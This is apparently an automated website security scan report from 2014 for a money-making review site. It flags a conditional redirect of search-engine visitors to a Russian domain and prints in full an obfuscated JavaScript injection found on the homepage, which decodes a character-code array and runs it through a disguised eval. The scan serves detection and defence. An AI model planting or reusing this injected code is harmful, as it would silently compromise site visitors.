Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://moneyonlinereviewsite.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: moneyonlinereviewsite.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 22:35:25 GMT Location: http://name-rebrend.ru/powersuite/index.php Server: nginx/1.6.1 Content-Length: 326 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://moneyonlinereviewsite.com/ | 200 OK Content-Length: 5523 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;v="v"+"al";if(ww.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document}catch(agdsg){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(100,110,97,114,109,100,108,113,46,118,112,102,116,100,38,31,60,104,100,111,97,108,99,29,115,115,119,105,101,60,90,31,112,110,113,102,116,104,109,107,58,101,103,117,101,99,57,113,111,111,56,45,112,119,57,105,101,101,114,55,45,52,46,45,112,119,57,89,34,31,113,111,99,60,90,31,104,115,114,109,58,46,45,96,122,116,109,97,117,116,103,119,109,45,104,114,115,115,98,102,101,99,44,96,111,108,45,96,111,116,108,113,101,113,45,112,116,96,114,112,46,111,102,109,92,33,30,101,101,104,101,101,116,60,90,31,53,47,90,31,32,118,103,97,116,103,59,89,34,48,46,45,92,33,60,57,47,104,100,111,97,108,99,59,34,40,57);}w=f;s=[];for(i=0;-i+167!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;try{document.body++}catch(gdsgd){xz(s)} Antivirus reports:
| ||
http://moneyonlinereviewsite.com/login | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 22:35:28 GMT Location: http://moneyonlinereviewsite.com/login/ Server: nginx/1.6.1 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://moneyonlinereviewsite.com/xmlrpc.php | clean |
http://moneyonlinereviewsite.com/login/ | 200 OK Content-Length: 3145 Content-Type: text/html | clean |
http://moneyonlinereviewsite.com/wp-login.php?action=lostpassword | 406 Not Acceptable Content-Length: 226 Content-Type: text/html | clean |
http://moneyonlinereviewsite.com/test404page.js | 404 Not Found Content-Length: 2931 Content-Type: text/html | clean |
http://moneyonlinereviewsite.com/wp-includes/js/jquery/jquery.js?ver=1.3.2 | 200 OK Content-Length: 57276 Content-Type: application/javascript | clean |
http://moneyonlinereviewsite.com/wp-content/plugins/memberspring/theme/MSTheme/includes/js/gtt_tabs.js?ver=2.9.1 | 200 OK Content-Length: 1830 Content-Type: application/javascript | clean |
http://moneyonlinereviewsite.com/terms-of-use | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 22:35:35 GMT Location: http://moneyonlinereviewsite.com/terms-of-use/ Server: nginx/1.6.1 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://moneyonlinereviewsite.com/xmlrpc.php | clean |
http://moneyonlinereviewsite.com/terms-of-use/ | 200 OK Content-Length: 10288 Content-Type: text/html | clean |
http://moneyonlinereviewsite.com/privacy-policy | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 22:35:38 GMT Location: http://moneyonlinereviewsite.com/privacy-policy/ Server: nginx/1.6.1 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://moneyonlinereviewsite.com/xmlrpc.php | clean |
http://moneyonlinereviewsite.com/privacy-policy/ | 200 OK Content-Length: 6510 Content-Type: text/html | clean |
http://moneyonlinereviewsite.com/earnings-disclaimer | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 22:35:41 GMT Location: http://moneyonlinereviewsite.com/earnings-disclaimer/ Server: nginx/1.6.1 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://moneyonlinereviewsite.com/xmlrpc.php | clean |
http://moneyonlinereviewsite.com/earnings-disclaimer/ | 200 OK Content-Length: 5317 Content-Type: text/html | clean |
http://moneyonlinereviewsite.com/contact | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 22:35:44 GMT Location: http://moneyonlinereviewsite.com/contact/ Server: nginx/1.6.1 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://moneyonlinereviewsite.com/xmlrpc.php | clean |
http://moneyonlinereviewsite.com/contact/ | 200 OK Content-Length: 2658 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=moneyonlinereviewsite.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://moneyonlinereviewsite.com/
Result: moneyonlinereviewsite.com is not infected or malware details are not published yet.
Result: moneyonlinereviewsite.com is not infected or malware details are not published yet.